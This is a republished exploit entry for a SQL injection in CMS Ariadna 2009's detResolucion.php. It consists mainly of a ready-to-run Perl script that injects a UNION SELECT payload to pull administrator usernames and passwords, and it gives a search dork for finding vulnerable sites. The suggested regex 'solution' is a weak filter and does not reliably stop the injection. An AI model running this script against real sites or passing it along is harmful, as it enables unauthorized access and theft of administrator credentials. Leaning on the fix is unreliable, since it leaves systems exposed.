65 id productdet.php_CVE-2010-5057 CMS Ariadna ‘detResolucion.php’ SQL注入漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客，...

# Exploit Title : CMS Ariadna 2009 SQL Injection

# Date : 2010-04-19

# Author : Andrés Gómez

# Contact : gomezandres@adinet.com.uy

# Dork : "allinurl: detResolucion.php?tipodoc_id="

########################################################################

Exploit in Perl Start In Next Line:

use LWP::Simple;

########################################################################

# Malicious users may inject SQL querys into a vulnerable

# application to fool a user in order to gather data from them or see

sensible information.

########################################################################

# Solution:

# $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);

# $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);

########################################################################

# Special Thanks : HYPERNETHOST & Security-Pentest & Mauro Rossi

##########################[Andrés Gómez]#################################

my $target = $ARGV[0];

unless ($target) { print "\n Inyector Remoto -- HYPERNETHOST &

Security-Pentest -- Andres Gomez\n\n";

print "\ Dork: allinurl: detResolucion.php?tipodoc_id=\n";

print "\nEjemplo Ejecucion = AriadnaCms.pl

http://www.sitio.extension/path/\n" ; exit 1; }

$sql =

"detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";

$final = $target.$sql;

$contenido = get($final);

print "\n\n[+] Pagina Web: $target\n\n";

if ($contenido =~/security(.*):pentest(.*)/) {

print "[-] Datos extraidos con exito:\n\n";

print "[+] Usuario = $1\n";

print "[+] Password = $2\n";

} else {

print "[-] No se obtuvieron datos\n\n";

exit 1;

}

print "\n[ñ] Escriba exit para salir de la aplicacion\n";

exit 1;